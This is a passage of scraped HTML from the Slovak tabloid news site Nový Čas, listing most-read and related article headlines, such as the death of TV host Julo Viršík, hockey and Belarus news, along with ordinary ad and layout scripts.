                <noscript><img src="https://img.cas.sk/cas//320px-c1/3327335.jpg/julo-virsik.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-4"
            href="/clanok/2536555/po-nahlej-smrti-jula-virsika-56-prisla-dalsia-rana-rozhodnutie-ktore-budu-mnohi-niest-len-tazko/"
            title="Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana: Rozhodnutie, ktoré budú mnohí niesť len ťažko"
            data-event="hp|najcitanejsie|clanok-4">
                <span class="hidden lg-visible md-visible sm-visible ">Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana: Rozhodnutie, ktoré budú mnohí niesť len ťažko</span>
        
                <span class="hidden xs-visible">Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">5.</div>
            <a class="article-image hidden"
                href="/clanok/2535371/nahla-smrt-moderatora-virsika-56-kardiochirurg-fischer-otvorene-julo-mohol-este-zit/"
                title="Náhla smrť moderátora Viršíka († 56), kardiochirurg Fischer otvorene: Julo mohol ešte žiť!"
                data-event="hp|najcitanejsie|clanok-5">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3324653.jpg"
                title="Náhla smrť moderátora Viršíka († 56), kardiochirurg Fischer otvorene: Julo mohol ešte žiť! | Nový Čas" alt="Náhla smrť"
                data-src="https://img.cas.sk/cas//320px-c1/3324653.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3324653.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3324653.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3324653.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-5"
            href="/clanok/2535371/nahla-smrt-moderatora-virsika-56-kardiochirurg-fischer-otvorene-julo-mohol-este-zit/"
            title="Náhla smrť moderátora Viršíka († 56), kardiochirurg Fischer otvorene: Julo mohol ešte žiť!"
            data-event="hp|najcitanejsie|clanok-5">
                <span class="hidden lg-visible md-visible sm-visible ">Náhla smrť moderátora Viršíka († 56), kardiochirurg Fischer otvorene: Julo mohol ešte žiť!</span>
        
                <span class="hidden xs-visible">Kardiochirurg Fischer otvorene: Julo Viršík († 56) mohol ešte žiť!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">6.</div>
            <a class="article-image hidden"
                href="/clanok/2535837/detaily-pohrebu-jula-virsika-56-v-krematoriu-uzialeny-kamarat-spravil-tazke-rozhodnutie/"
                title="Detaily pohrebu Jula Viršíka († 56) v krematóriu: Užialený kamarát spravil ťažké rozhodnutie"
                data-event="hp|najcitanejsie|clanok-6">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"
                title="Detaily pohrebu Jula Viršíka († 56) v krematóriu: Užialený kamarát spravil ťažké rozhodnutie | Nový Čas" alt="Detaily pohrebu"
                data-src="https://img.cas.sk/cas//320px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-6"
            href="/clanok/2535837/detaily-pohrebu-jula-virsika-56-v-krematoriu-uzialeny-kamarat-spravil-tazke-rozhodnutie/"
            title="Detaily pohrebu Jula Viršíka († 56) v krematóriu: Užialený kamarát spravil ťažké rozhodnutie"
            data-event="hp|najcitanejsie|clanok-6">
                <span class="hidden lg-visible md-visible sm-visible ">Detaily pohrebu Jula Viršíka († 56) v krematóriu: Užialený kamarát spravil ťažké rozhodnutie</span>
        
                <span class="hidden xs-visible">Detaily pohrebu Jula Viršíka († 56) v krematóriu</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">7.</div>
            <a class="article-image hidden"
                href="/clanok/2536545/po-nevydarenom-zapase-s-ceskom-sa-vynaraju-pochybnosti-je-toto-pravy-dovod-prehry-slovenska/"
                title="Po nevydarenom zápase s Českom sa vynárajú pochybnosti: Je toto pravý dôvod prehry Slovenska?"
                data-event="hp|najcitanejsie|clanok-7">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3327339.jpg/hokej.jpg"
                title="Po nevydarenom zápase s Českom sa vynárajú pochybnosti: Je toto pravý dôvod prehry Slovenska? | Nový Čas" alt="Po nevydarenom"
                data-src="https://img.cas.sk/cas//320px-c1/3327339.jpg/hokej.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3327339.jpg/hokej.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3327339.jpg/hokej.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3327339.jpg/hokej.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-7"
            href="/clanok/2536545/po-nevydarenom-zapase-s-ceskom-sa-vynaraju-pochybnosti-je-toto-pravy-dovod-prehry-slovenska/"
            title="Po nevydarenom zápase s Českom sa vynárajú pochybnosti: Je toto pravý dôvod prehry Slovenska?"
            data-event="hp|najcitanejsie|clanok-7">
                <span class="hidden lg-visible md-visible sm-visible ">Po nevydarenom zápase s Českom sa vynárajú pochybnosti: Je toto pravý dôvod prehry Slovenska?</span>
        
                <span class="hidden xs-visible">Je toto pravý dôvod prehry s Českom?</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">8.</div>
            <a class="article-image hidden"
                href="/clanok/2536561/co-to-na-nas-hraju-forgac-sokoval-najnovsimi-vyjadreniami-pravda-o-rozchode-s-manzelkou/"
                title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!"
                data-event="hp|najcitanejsie|clanok-8">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou! | Nový Čas" alt="Čo to"
                data-src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-8"
            href="/clanok/2536561/co-to-na-nas-hraju-forgac-sokoval-najnovsimi-vyjadreniami-pravda-o-rozchode-s-manzelkou/"
            title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!"
            data-event="hp|najcitanejsie|clanok-8">
                <span class="hidden lg-visible md-visible sm-visible ">Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!</span>
        
                <span class="hidden xs-visible">Forgáč šokoval najnovšími vyjadreniami o rozchode s manželkou</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
			</div>		<div class="tiny-clear"></div>

	</div>
        <div id="square-scrolling">
<!--
<div class="rs-advertisement rs-advertisement-cas-desktop-ak-scrolling">
  <div id='mid2'>
    <script>
      googletag.cmd.push(function() { googletag.display('mid2'); });
    </script>
  </div>
</div>
-->

  <div class="rs-advertisement rs-advertisement-cas-desktop-square-scrolling pl-md-10">
  <!-- Reklamna plocha cas-desktop-square-scrolling -->
    <div id='mid2' style="max-height:600px; width:300px;margin-top:20px;box-sizing: border-box;">
      <script>
        googletag.cmd.push(function() { googletag.display('mid2'); });
      </script>
    </div>     
  </div>
        </div>
        <div class="tiny-clear"></div>
        <script type="text/javascript">
                var windowWidth = window.innerWidth;
                if (windowWidth >= 768) {
                    $(function () {
                        var articleHeight = $('.article-container article').height();
                        var sidesectionHeight = $('.article-container .side-section').height();
                        if (articleHeight <= sidesectionHeight) {
                            $('.article-container article').height(sidesectionHeight);
                        }
                    });
                }
                $('#square-scrolling').floating({wrapper: '#float5dced80a34cd7', offsetTop: 25});
                var questionnaire = $('.article-object-questionnaire.type-3');
                if (questionnaire.length > 0) {
                    var qWrapper = questionnaire.find('.q-question-wrapper');
                    qWrapper.each(function (index, element) {
                        var image = $(element).find('.q-image-wrapper');
                        if (image.length == 0) {
                            $(element).find('.q-answer-wrapper').css('width', '100%');
                        }
                    });
                }


        </script>
    </aside>
</div>
<section class="article-bottom md-visible sm-visible xs-visible">
    <div class="row bordered"><div class="rs-advertisement rs-advertisement-strossle-widget">
    <!-- Reklamna plocha strossle-widget -->
    <div class="strossle-widget"></div>
</div>    
    <div class="top-articles">
        <div class="top-content-big-article cloneable hidden xs-visible"
            data-clone-target="#article-top_list-content-article-0"></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 hidden lg-visible md-visible sm-visible"
                id="article-top_list-content-article-1">
                <a class="article-image" href="/clanok/2537963/ludia-z-bieloruska-utekaju-pred-prisnym-rezimom-litva-hlasi-narast-nelegalnych-prechodov-cez-hranice/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-1-obrazok"
                    title="Ľudia z Bieloruska utekajú pred prísnym režimom: Litva hlási nárast nelegálnych prechodov cez hranice | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330423.jpg/madarsko-hranice.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330423.jpg/madarsko-hranice.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330423.jpg/madarsko-hranice.jpg"
                        title="Ľudia z Bieloruska utekajú pred prísnym režimom: Litva hlási nárast nelegálnych prechodov cez hranice | Nový Čas" alt=" Ľudia z">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330423.jpg/madarsko-hranice.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537963/ludia-z-bieloruska-utekaju-pred-prisnym-rezimom-litva-hlasi-narast-nelegalnych-prechodov-cez-hranice/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-1-nadpis"
                            title="Ľudia z Bieloruska utekajú pred prísnym režimom: Litva hlási nárast nelegálnych prechodov cez hranice">
                            <span class="hidden lg-visible md-visible sm-visible">Ľudia z Bieloruska utekajú pred prísnym režimom: Litva hlási nárast nelegálnych prechodov cez hranice                            </span>
                            <span class="hidden xs-visible">Litva hlási prudký nárast prechodov cez bieloruské hranice                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>
                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-2">
                <a class="article-image" href="/clanok/2537955/papez-sa-chce-politikom-v-madarsku-vyhnut-jeho-navsteva-slovenska-bude-pre-nich-fackou/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-2-obrazok"
                    title="Pápež sa chce politikom v Maďarsku vyhnúť: Jeho návšteva Slovenska bude pre nich fackou! | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330411.jpg/papez-papez-frantisek-frantisek.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330411.jpg/papez-papez-frantisek-frantisek.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330411.jpg/papez-papez-frantisek-frantisek.jpg"
                        title="Pápež sa chce politikom v Maďarsku vyhnúť: Jeho návšteva Slovenska bude pre nich fackou! | Nový Čas" alt=" Pápež sa">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330411.jpg/papez-papez-frantisek-frantisek.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537955/papez-sa-chce-politikom-v-madarsku-vyhnut-jeho-navsteva-slovenska-bude-pre-nich-fackou/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-2-nadpis"
                            title="Pápež sa chce politikom v Maďarsku vyhnúť: Jeho návšteva Slovenska bude pre nich fackou!">
                            <span class="hidden lg-visible md-visible sm-visible">Pápež sa chce politikom v Maďarsku vyhnúť: Jeho návšteva Slovenska bude pre nich fackou!                            </span>
                            <span class="hidden xs-visible">Pápežova návšteva Slovenska bude pre Maďarsko fackou!                            </span>
                        </a>
                    </div>
                </div>
            </div>               <div class="sm-clear"></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-3">
                <a class="article-image" href="/clanok/2537949/ceske-ministerstvo-odsudilo-lukasenkov-rezim-tvrdi-ze-vystupenie-pratasevica-bolo-vynutene/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-3-obrazok"
                    title="České ministerstvo odsúdilo Lukašenkov režim: Tvrdí, že vystúpenie Prataseviča bolo vynútené | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330385.jpg/bielorusko-novinar-aktivista-pratasevic.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330385.jpg/bielorusko-novinar-aktivista-pratasevic.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330385.jpg/bielorusko-novinar-aktivista-pratasevic.jpg"
                        title="České ministerstvo odsúdilo Lukašenkov režim: Tvrdí, že vystúpenie Prataseviča bolo vynútené | Nový Čas" alt=" České ministerstvo">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330385.jpg/bielorusko-novinar-aktivista-pratasevic.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537949/ceske-ministerstvo-odsudilo-lukasenkov-rezim-tvrdi-ze-vystupenie-pratasevica-bolo-vynutene/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-3-nadpis"
                            title="České ministerstvo odsúdilo Lukašenkov režim: Tvrdí, že vystúpenie Prataseviča bolo vynútené">
                            <span class="hidden lg-visible md-visible sm-visible">České ministerstvo odsúdilo Lukašenkov režim: Tvrdí, že vystúpenie Prataseviča bolo vynútené                            </span>
                            <span class="hidden xs-visible">Česko tvrdí, že vystúpenie Prataseviča bolo vynútené                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class="md-clear lg-clear "></div>
                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-4">
                <a class="article-image" href="/clanok/2537909/bojite-sa-bolaveho-ramena-po-ockovani-tu-je-ucinny-trik-odporuca-ho-aj-lekar/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-4-obrazok"
                    title="Bojíte sa boľavého ramena po očkovaní? Tu je účinný trik! Odporúča ho aj lekár | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330331.png/vedlajsie-ucinky-chellyfst-tocenie-kruzenie-prevencia-bolesti.png"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330331.png/vedlajsie-ucinky-chellyfst-tocenie-kruzenie-prevencia-bolesti.png"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330331.png/vedlajsie-ucinky-chellyfst-tocenie-kruzenie-prevencia-bolesti.png"
                        title="Bojíte sa boľavého ramena po očkovaní? Tu je účinný trik! Odporúča ho aj lekár | Nový Čas" alt=" Bojíte sa">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330331.png/vedlajsie-ucinky-chellyfst-tocenie-kruzenie-prevencia-bolesti.png"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags"><span class="flag">Foto</span>    </div>                        <a class="default-article-title" href="/clanok/2537909/bojite-sa-bolaveho-ramena-po-ockovani-tu-je-ucinny-trik-odporuca-ho-aj-lekar/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-4-nadpis"
                            title="Bojíte sa boľavého ramena po očkovaní? Tu je účinný trik! Odporúča ho aj lekár">
                            <span class="hidden lg-visible md-visible sm-visible">Bojíte sa boľavého ramena po očkovaní? Tu je účinný trik! Odporúča ho aj lekár                            </span>
                            <span class="hidden xs-visible">Bojíte sa boľavého ramena po očkovaní? Tu je trik!                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>
                <div class="sm-clear "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-5">
                <a class="article-image" href="/clanok/2537947/k-nasim-susedom-dorazila-z-madarska-naloz-vakcin-cesko-prislubilo-ze-ich-neskor-vrati/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-5-obrazok"
                    title="K našim susedom dorazila z Maďarska nálož vakcín: Česko prisľúbilo, že ich neskôr vráti | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330381.jpg/vakcina-pfizer-biontech.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330381.jpg/vakcina-pfizer-biontech.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330381.jpg/vakcina-pfizer-biontech.jpg"
                        title="K našim susedom dorazila z Maďarska nálož vakcín: Česko prisľúbilo, že ich neskôr vráti | Nový Čas" alt=" K našim">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330381.jpg/vakcina-pfizer-biontech.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537947/k-nasim-susedom-dorazila-z-madarska-naloz-vakcin-cesko-prislubilo-ze-ich-neskor-vrati/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-5-nadpis"
                            title="K našim susedom dorazila z Maďarska nálož vakcín: Česko prisľúbilo, že ich neskôr vráti">
                            <span class="hidden lg-visible md-visible sm-visible">K našim susedom dorazila z Maďarska nálož vakcín: Česko prisľúbilo, že ich neskôr vráti                            </span>
                            <span class="hidden xs-visible">Do Česka dorazila z Maďarska nálož vakcín                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-6">
                <a class="article-image" href="/clanok/2537945/americania-zaznamenali-zahadne-pripady-pocet-narastol-ide-o-ufo-vlada-prehovorila/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-6-obrazok"
                    title="Američania zaznamenali záhadné prípady, počet narástol: Ide o UFO? Vláda prehovorila | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330369.jpg/vojna-hitler-ufo.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330369.jpg/vojna-hitler-ufo.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330369.jpg/vojna-hitler-ufo.jpg"
                        title="Američania zaznamenali záhadné prípady, počet narástol: Ide o UFO? Vláda prehovorila | Nový Čas" alt=" Američania zaznamenali">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330369.jpg/vojna-hitler-ufo.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537945/americania-zaznamenali-zahadne-pripady-pocet-narastol-ide-o-ufo-vlada-prehovorila/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-6-nadpis"
                            title="Američania zaznamenali záhadné prípady, počet narástol: Ide o UFO? Vláda prehovorila">
                            <span class="hidden lg-visible md-visible sm-visible">Američania zaznamenali záhadné prípady, počet narástol: Ide o UFO? Vláda prehovorila                            </span>
                            <span class="hidden xs-visible">Záhadné prípady v USA: Ide o UFO? Vláda prehovorila                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class="md-clear lg-clear"></div>
                <div class="sm-clear"></div>
                <div class="tiny-clear"></div>    </div>
<div class="rs-advertisement rs-advertisement-cas-mobile-ak-article mt-20"><!-- Reklamna plocha cas-mobile-ak-article --><div style="font-family: PT Sans Narrow,serif;font-weight: 700;font-size: 22px;color:#ed1c24 !important;text-align:left;margin-left:10px;width:100%;margin-top:20px;margin-bottom:10px;">Odpor&#xFA;&#x10D;ame z TIVI.sk</div>
<div style="max-width:100%;height:auto;position:relative;"><script type="text/javascript" src="https://mr1a.exs.pl/widget/widget_playlist.php?widget=185"></script></div></div>    </div></section>
<div class="section-menu bordered red sm-visible xs-visible mb-sm-10 mb-xs-10 mt-sm-20 mt-xs-20"></div>
<div class="sm-visible xs-visible">
    <div class="feed-box cloneable" data-clone-target="aside.side-section .feed-box"></div>
    <div class="mt-sm-30 mt-xs-30 article-box article-box-most-read article-box-most-read-numbered switch-btn-identifier cloneable"
         data-clone-target="aside.side-section .article-box-most-read-numbered"></div>
</div><div class="rs-advertisement rs-advertisement-cas-desktop-screen-middle text-center">
    <!-- Reklamna plocha cas-desktop-screen-middle -->
    <div id='mid1'>
        <script>
            googletag.cmd.push(function() { googletag.display('mid1'); });
        </script>
    </div>
</div><div class="section-menu mt20 clear-fix">
    <h2 class="title fleft mr10">
		<a data-event=" data-event="clanok|pod-clankom-top-6|predpredaj" " class="predpredaj-black uppercase" target="_blank" href="https://predpredaj.zoznam.sk/" title="Predpredaj.sk">Predpredaj.sk</a>
	</h2>
</div>
<div class="predpredaj-box-wrapper mt10">
    <iframe name="predpredaj-slider" src="https://predpredaj.zoznam.sk/novy-cas-spravy/" height="310" allowfullscreen="" scrolling="no" style="border: none;height: 260px; width: 1px;min-width: 100%;"></iframe>
</div><div class="rs-advertisement rs-advertisement-cas-mobile-mobile-middle">
    <!-- /21766967026/M_mid3 -->
    <div id='M_mid3'>
      <script>
        googletag.cmd.push(function() { googletag.display('M_mid3'); });
      </script>
    </div>
</div><div class="page-wrapper page-wrapper-right-side mt20 pt-xs-10 pb-xs-10 pt-sm-20 pb-sm-10 pt-md-20 pb-md-20 pt-lg-20 pb-lg-20 hpArticleListBottom">
    <div class="col-line-separator col-line-separator-right lg-visible md-visible"></div>
    <section id="article-list" class="main-section">
        <div class="main-section-wrapper">
            <div class="menu footer-left-menu">
                <div class="floating">    <div class="main-logo-wrapper">
        <a href="/" class="rs-logo rs-logo-novy-cas-65 lg-visible"  data-event="|menu-hlavicka|logo-cas"  title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-60 md-visible"  data-event="|menu-hlavicka|logo-cas"  title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-75 sm-visible"  data-event="|menu-hlavicka|logo-cas"  title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-45 xs-visible"  data-event="|menu-hlavicka|logo-cas"  title="Čas.sk - Hlavná stránka"></a>
    </div>
<menu class="hp-section-menu">			<a href="/spravy/koronavirus/"  data-event="clanok||menu-">Koronavírus</a>			<a href="/spravy/" class="menu-item" data-event="clanok||menu-">Správy</a>			<a href="/prominenti/"  data-event="clanok||menu-">Prominenti</a>			<a href="/sport/" class="menu-item" data-event="clanok||menu-">Šport</a>			<a href="/sport/hokej/ms-hokej-2021/"  data-event="clanok||menu-">MS v hokeji 2021</a>			<a href="/tip-od-vas/" class="menu-item" data-event="clanok||menu-">Tip od Vás</a>			<a href="/prominenti/prominenti-kucherenko/"  data-event="clanok||menu-">Kucherenko</a>			<a href="https://tivi.cas.sk/"  data-event="clanok||menu-">TIVI.SK</a>			<a href="/horoskopy/"  data-event="clanok||menu-">Horoskop</a>			<a href="/aktualne-titulky/"  data-event="clanok||menu-">Titulka</a>			<a href="/spravy/europa/"  data-event="clanok||menu-">Európa</a></menu>
<div class="cb"></div>
<div class="mobile-section-menu hidden sm-visible xs-visible" id="5dc027677c87d">
	<div class="mobile-section-menu-wrapper">
		<select>
			<option value=""></option>					<option value="/spravy/koronavirus/">Koronavírus</option>					<option value="/spravy/">Správy</option>					<option value="/prominenti/">Prominenti</option>					<option value="/sport/">Šport</option>					<option value="/sport/hokej/ms-hokej-2021/">MS v hokeji 2021</option>					<option value="/tip-od-vas/">Tip od Vás</option>					<option value="/prominenti/prominenti-kucherenko/">Kucherenko</option>					<option value="https://tivi.cas.sk/">TIVI.SK</option>					<option value="/horoskopy/">Horoskop</option>					<option value="/aktualne-titulky/">Titulka</option>					<option value="/spravy/europa/">Európa</option>		</select>
		<span class="mobile-section-menu-button">Nový Čas</span>
	</div>
</div>

<script>
	$(function() {
		$('#5dc027677c87d select').change(function() {
			var href = $('#5dc027677c87d select option:selected').val();
			if (href != '') {
				location.href = href;
			}
		});
	});
</script>
                    <script>$('.floating').floating({wrapper: '.article-list', minWidth: 768, offsetTop: 45});</script>
                </div>
            </div>
<div class="article-list">
    <div class=" hp-bottom-list" id="article_list">

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537959/slovaci-do-21-rokov-prehrali-v-priprave-nestacili-na-rovesnikov-z-rakuska/"
                    data-event="clanok|box-nekonecne-spravy|clanok-1-obrazok"
                    title="Slováci do 21 rokov prehrali v príprave, nestačili na rovesníkov z Rakúska">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330421.jpg/futbal-slovensko-21.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330421.jpg/futbal-slovensko-21.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330421.jpg/futbal-slovensko-21.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330421.jpg/futbal-slovensko-21.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330421.jpg/futbal-slovensko-21.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 21:33&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/sport/futbal/" title="Futbal">Futbal                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-1-nadpis"
                            href="/clanok/2537959/slovaci-do-21-rokov-prehrali-v-priprave-nestacili-na-rovesnikov-z-rakuska/"
                            title="Slováci do 21 rokov prehrali v príprave, nestačili na rovesníkov z Rakúska">Slováci do 21 rokov prehrali v príprave, nestačili na rovesníkov z Rakúska                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-1-nadpis"
                            href="/clanok/2537959/slovaci-do-21-rokov-prehrali-v-priprave-nestacili-na-rovesnikov-z-rakuska/"
                            title="Slováci do 21 rokov prehrali v príprave, nestačili na rovesníkov z Rakúska">Slováci do 21 rokov prehrali v príprave, nestačili na rovesníkov z Rakúska                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537961/pandemia-sa-podpisala-pod-vedomosti-letne-doucovanie-pre-ziakov-zakladnych-a-strednych-skol/"
                    data-event="clanok|box-nekonecne-spravy|clanok-2-obrazok"
                    title="Pandémia sa podpísala pod vedomosti: Letné doučovanie pre žiakov základných a stredných škôl">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330415.jpg/school-supplies-first-day-of-school-photography-koronavirus-ilustracne-skoly-reopening-covid-19-educational-institutions-and-organizations-desk-prazdna-skola-table-vyucovane-closed-vyucovanoe-education-university-studying-empty-social-issues-pandemic-illness-infectious-disease-coronavirus-indoors-wood-material-disinfection-equipment-elementary-school-school-building-vyucovanie-classroom-clean-high-school-furniture-chair-empty-desk-back-to-school-education-building-attending-tiled-floor.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330415.jpg/school-supplies-first-day-of-school-photography-koronavirus-ilustracne-skoly-reopening-covid-19-educational-institutions-and-organizations-desk-prazdna-skola-table-vyucovane-closed-vyucovanoe-education-university-studying-empty-social-issues-pandemic-illness-infectious-disease-coronavirus-indoors-wood-material-disinfection-equipment-elementary-school-school-building-vyucovanie-classroom-clean-high-school-furniture-chair-empty-desk-back-to-school-education-building-attending-tiled-floor.jpg"
